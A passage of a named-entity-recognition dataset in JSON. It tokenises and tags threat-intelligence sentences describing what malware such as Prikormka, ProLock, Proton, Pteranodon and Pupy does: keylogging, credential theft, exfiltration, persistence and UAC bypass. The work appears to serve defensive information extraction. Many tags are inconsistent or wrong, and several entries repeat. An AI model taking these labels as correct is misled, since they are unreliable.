"Base64." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "encrypting", - "its", - "own", - "log", - "files,", - "the", - "log", - "encryption", - "module", - "in", - "Prikormka", - "deletes", - "the", - "original,", - "unencrypted", - "files", - "from", - "the", - "host." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "module", - "in", - "Prikormka", - "collects", - "information", - "about", - "the", - "paths,", - "size,", - "and", - "creation", - "time", - "of", - "files", - "with", - "specific", - "file", - "extensions,", - "but", - "not", - "the", - "actual", - "content", - "of", - "the", - "file." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Prikormka", - "contains", - "a", - "keylogger", - "module", - "that", - "collects", - "keystrokes", - "and", - "the", - "titles", - "of", - "foreground", - "windows." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Prikormka", - "creates", - "a", - "directory,", - "<code>%USERPROFILE%\\AppData\\Local\\SKC\\</code>,", - "which", - "is", - "used", - "to", - "store", - "collected", - "log", - "files." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "A", - "module", - "in", - "Prikormka", - "collects", - "information", - "on", - "available", - "printers", - "and", - "disk", - "drives." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Prikormka", - "adds", - "itself", - "to", - "a", - "Registry", - "Run", - "key", - "with", - "the", - "name", - "guidVGA", - "or", - "guidVSA." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Prikormka", - "uses", - "rundll32.exe", - "to", - "load", - "its", - "DLL." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Prikormka", - "contains", - "a", - "module", - "that", - "captures", - "screenshots", - "of", - "the", - "victim's", - "desktop." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "module", - "in", - "Prikormka", - "collects", - "information", - "from", - "the", - "victim", - "about", - "installed", - "anti-virus", - "software." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Prikormka", - "encodes", - "C2", - "traffic", - "with", - "Base64." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Prikormka", - "encrypts", - "some", - "C2", - "traffic", - "with", - "the", - "Blowfish", - "cipher." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "A", - "module", - "in", - "Prikormka", - "collects", - "information", - "from", - "the", - "victim", - "about", - "Windows", - "OS", - "version,", - "computer", - "name,", - "battery", - "info,", - "and", - "physical", - "memory." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "module", - "in", - "Prikormka", - "collects", - "information", - "from", - "the", - "victim", - "about", - "its", - "IP", - "addresses", - "and", - "MAC", - "addresses." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "module", - "in", - "Prikormka", - "collects", - "information", - "from", - "the", - "victim", - "about", - "the", - "current", - "user", - "name." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ProLock", - "can", - "use", - "BITS", - "jobs", - "to", - "download", - "its", - "malicious", - "payload." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ProLock", - "can", - "encrypt", - "files", - "on", - "a", - "compromised", - "host", - "with", - "RC6,", - "and", - "encrypts", - "the", - "key", - "with", - "RSA-1024." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "ProLock", - "can", - "use", - "CVE-2019-0859", - "to", - "escalate", - "privileges", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ProLock", - "can", - "remove", - "files", - "containing", - "its", - "payload", - "after", - "they", - "are", - "executed." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ProLock", - "can", - "use", - "vssadmin.exe", - "to", - "remove", - "volume", - "shadow", - "copies." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "ProLock", - "can", - "use", - ".jpg", - "and", - ".bmp", - "files", - "to", - "store", - "its", - "payload." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ProLock", - "can", - "use", - "WMIC", - "to", - "execute", - "scripts", - "on", - "targeted", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Proton", - "zips", - "up", - "files", - "before", - "exfiltrating", - "them." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Proton", - "removes", - "logs", - "from", - "<code>/var/logs</code>", - "and", - "<code>/Library/logs</code>." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Proton", - "gathers", - "credentials", - "for", - "Google", - "Chrome." - ], - "ner_tags": [ - "B-Idus", - "B-SamFile", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Proton", - "uses", - "an", - "encrypted", - "file", - "to", - "store", - "commands", - "and", - "configuration", - "values." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Proton", - "kills", - "security", - "tools", - "like", - "Wireshark", - "that", - "are", - "running." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Proton", - "removes", - "all", - "files", - "in", - "the", - "/tmp", - "directory." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Proton", - "prompts", - "users", - "for", - "their", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Proton", - "gathers", - "credentials", - "in", - "files", - "for", - "keychains." - ], - "ner_tags": [ - "B-Idus", - "B-SamFile", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Proton", - "uses", - "a", - "keylogger", - "to", - "capture", - "keystrokes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Proton", - "persists", - "via", - "Launch", - "Agent." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Proton", - "gathers", - "credentials", - "in", - "files", - "for", - "1password." - ], - "ner_tags": [ - "B-Idus", - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Proton", - "captures", - "the", - "content", - "of", - "the", - "desktop", - "with", - "the", - "screencapture", - "binary." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Proton", - "modifies", - "the", - "tty_tickets", - "line", - "in", - "the", - "sudoers", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Proton", - "uses", - "macOS'", - ".command", - "file", - "type", - "to", - "script", - "actions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Proton", - "uses", - "VNC", - "to", - "connect", - "into", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Proxysvc", - "automatically", - "collects", - "data", - "about", - "the", - "victim", - "and", - "sends", - "it", - "to", - "the", - "control", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Proxysvc", - "can", - "overwrite", - "files", - "indicated", - "by", - "the", - "attacker", - "before", - "deleting", - "them." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Proxysvc", - "searches", - "the", - "local", - "system", - "and", - "gathers", - "data." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Proxysvc", - "performs", - "data", - "exfiltration", - "over", - "the", - "control", - "server", - "channel", - "using", - "a", - "custom", - "protocol." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Proxysvc", - "can", - "delete", - "files", - "indicated", - "by", - "the", - "attacker", - "and", - "remove", - "itself", - "from", - "disk", - "using", - "a", - "batch", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Proxysvc", - "lists", - "files", - "in", - "directories." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Proxysvc", - "lists", - "processes", - "running", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Proxysvc", - "gathers", - "product", - "names", - "from", - "the", - "Registry", - "key:", - "<code>HKLM\\Software\\Microsoft\\Windows", - "NT\\CurrentVersion", - "ProductName</code>", - "and", - "the", - "processor", - "description", - "from", - "the", - "Registry", - "key", - "<code>HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", - "ProcessorNameString</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Proxysvc", - "registers", - "itself", - "as", - "a", - "service", - "on", - "the", - "victim’s", - "machine", - "to", - "run", - "as", - "a", - "standalone", - "process." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Proxysvc", - "collects", - "the", - "OS", - "version,", - "country", - "name,", - "MAC", - "address,", - "computer", - "name,", - "physical", - "memory", - "statistics,", - "and", - "volume", - "information", - "for", - "all", - "drives", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Proxysvc", - "collects", - "the", - "network", - "adapter", - "information", - "and", - "domain/username", - "information", - "based", - "on", - "current", - "remote", - "sessions." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "As", - "part", - "of", - "the", - "data", - "reconnaissance", - "phase,", - "Proxysvc", - "grabs", - "the", - "system", - "time", - "to", - "send", - "back", - "to", - "the", - "control", - "server." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Proxysvc", - "uses", - "HTTP", - "over", - "SSL", - "to", - "communicate", - "commands", - "with", - "the", - "control", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Proxysvc", - "executes", - "a", - "binary", - "on", - "the", - "system", - "and", - "logs", - "the", - "results", - "into", - "a", - "temp", - "file", - "by", - "using:", - "<code>cmd.exe", - "/c", - "\"<file_path>", - ">", - "%temp%\\PM*", - ".tmp", - "2>&1\"</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "PsExec", - "has", - "the", - "ability", - "to", - "remotely", - "create", - "accounts", - "on", - "target", - "systems." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PsExec", - "can", - "be", - "used", - "to", - "download", - "or", - "upload", - "a", - "file", - "over", - "a", - "network", - "share." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PsExec,", - "a", - "tool", - "that", - "has", - "been", - "used", - "by", - "adversaries,", - "writes", - "programs", - "to", - "the", - "<code>ADMIN$</code>", - "network", - "share", - "to", - "execute", - "commands", - "on", - "remote", - "systems." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Microsoft", - "Sysinternals", - "PsExec", - "is", - "a", - "popular", - "administration", - "tool", - "that", - "can", - "be", - "used", - "to", - "execute", - "binaries", - "on", - "remote", - "systems", - "using", - "a", - "temporary", - "Windows", - "service." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "PsExec", - "can", - "leverage", - "Windows", - "services", - "to", - "escalate", - "privileges", - "from", - "administrator", - "to", - "SYSTEM", - "with", - "the", - "<code>-s</code>", - "argument." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Psylo", - "exfiltrates", - "data", - "to", - "its", - "C2", - "server", - "over", - "the", - "same", - "protocol", - "as", - "C2", - "communications." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Psylo", - "has", - "commands", - "to", - "enumerate", - "all", - "storage", - "devices", - "and", - "to", - "find", - "all", - "files", - "that", - "start", - "with", - "a", - "particular", - "string." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Psylo", - "has", - "a", - "command", - "to", - "download", - "a", - "file", - "to", - "the", - "system", - "from", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Psylo", - "has", - "a", - "command", - "to", - "conduct", - "timestomping", - "by", - "setting", - "a", - "specified", - "file’s", - "timestamps", - "to", - "match", - "those", - "of", - "a", - "system", - "file", - "in", - "the", - "System32", - "directory." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Psylo", - "uses", - "HTTPS", - "for", - "C2." - ], - "ner_tags": [ - "B-Time", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Pteranodon", - "can", - "decrypt", - "encrypted", - "data", - "strings", - "prior", - "to", - "using", - "them." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pteranodon", - "can", - "use", - "a", - "dynamic", - "Windows", - "hashing", - "algorithm", - "to", - "map", - "API", - "components." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pteranodon", - "exfiltrates", - "screenshot", - "files", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pteranodon", - "can", - "delete", - "files", - "that", - "may", - "interfere", - "with", - "it", - "executing.", - "It", - "also", - "can", - "delete", - "temporary", - "files", - "and", - "itself", - "after", - "the", - "initial", - "script", - "executes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pteranodon", - "identifies", - "files", - "matching", - "certain", - "file", - "extension", - "and", - "copies", - "them", - "to", - "subdirectories", - "it", - "created." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pteranodon", - "can", - "download", - "and", - "execute", - "additional", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Pteranodon", - "creates", - "various", - "subdirectories", - "under", - "<code>%Temp%\\reports\\%</code>", - "and", - "copies", - "files", - "to", - "those", - "subdirectories.", - "It", - "also", - "creates", - "a", - "folder", - "at", - "<code>C:\\Users\\<Username>\\AppData\\Roaming\\Microsoft\\store</code>", - "to", - "store", - "screenshot", - "JPEG", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pteranodon", - "can", - "use", - "mshta.exe", - "to", - "execute", - "an", - "HTA", - "file", - "hosted", - "on", - "a", - "remote", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pteranodon", - "has", - "used", - "various", - "API", - "calls." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pteranodon", - "copies", - "itself", - "to", - "the", - "Startup", - "folder", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pteranodon", - "executes", - "functions", - "using", - "rundll32.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Pteranodon", - "schedules", - "tasks", - "to", - "invoke", - "its", - "components", - "in", - "order", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pteranodon", - "can", - "capture", - "screenshots", - "at", - "a", - "configurable", - "interval." - ], - "ner_tags": [ - "B-Time", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pteranodon", - "has", - "the", - "ability", - "to", - "use", - "anti-detection", - "functions", - "to", - "identify", - "sandbox", - "environments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pteranodon", - "can", - "use", - "a", - "malicious", - "VBS", - "file", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pteranodon", - "can", - "use", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Pteranodon", - "can", - "use", - "`cmd.exe`", - "for", - "execution", - "on", - "victim", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "compress", - "data", - "with", - "Zip", - "before", - "sending", - "it", - "over", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy's", - "default", - "encryption", - "for", - "its", - "C2", - "communication", - "channel", - "is", - "SSL,", - "but", - "it", - "also", - "has", - "transport", - "options", - "for", - "RSA", - "and", - "AES." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "record", - "sound", - "with", - "the", - "microphone." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "bypass", - "Windows", - "UAC", - "through", - "either", - "DLL", - "hijacking,", - "eventvwr,", - "or", - "appPaths." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "use", - "Lazagne", - "for", - "harvesting", - "credentials." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "has", - "a", - "module", - "to", - "clear", - "event", - "logs", - "with", - "PowerShell." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "use", - "Lazagne", - "for", - "harvesting", - "credentials." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "use", - "Lazagne", - "for", - "harvesting", - "credentials." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "use", - "Lazagne", - "for", - "harvesting", - "credentials." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "user", - "PowerView", - "to", - "execute", - "“net", - "user”", - "commands", - "and", - "create", - "domain", - "accounts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "migrate", - "into", - "another", - "process", - "using", - "reflective", - "DLL", - "injection." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "send", - "screenshots", - "files,", - "keylogger", - "data,", - "files,", - "and", - "recorded", - "audio", - "back", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "B-HackOrg", - "O", - "B-Features", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "walk", - "through", - "directories", - "and", - "recursively", - "search", - "for", - "strings", - "in", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "upload", - "and", - "download", - "to/from", - "a", - "victim", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "uses", - "a", - "keylogger", - "to", - "capture", - "keystrokes", - "it", - "then", - "sends", - "back", - "to", - "the", - "server", - "after", - "it", - "is", - "stopped." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "sniff", - "plaintext", - "network", - "credentials", - "and", - "use", - "NBNS", - "Spoofing", - "to", - "poison", - "name", - "services." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Way", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "use", - "Lazagne", - "for", - "harvesting", - "credentials." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "execute", - "Lazagne", - "as", - "well", - "as", - "Mimikatz", - "using", - "PowerShell." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Pupy", - "uses", - "PowerView", - "and", - "Pywerview", - "to", - "perform", - "discovery", - "commands", - "such", - "as", - "net", - "user,", - "net", - "group,", - "net", - "local", - "group,", - "etc." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "user", - "PowerView", - "to", - "execute", - "“net", - "user”", - "commands", - "and", - "create", - "local", - "system", - "accounts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Pupy", - "can", - "interact", - "with", - "a", - "victim’s", - "Outlook", - "session", - "and", - "look", - "through", - "folders", - "and", - "emails." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Pupy", - "has", - "a", - "built-in", - "module", - "for", - "port", - "scanning." - ], - "ner_tags": [ - "B-Way", - "O", - 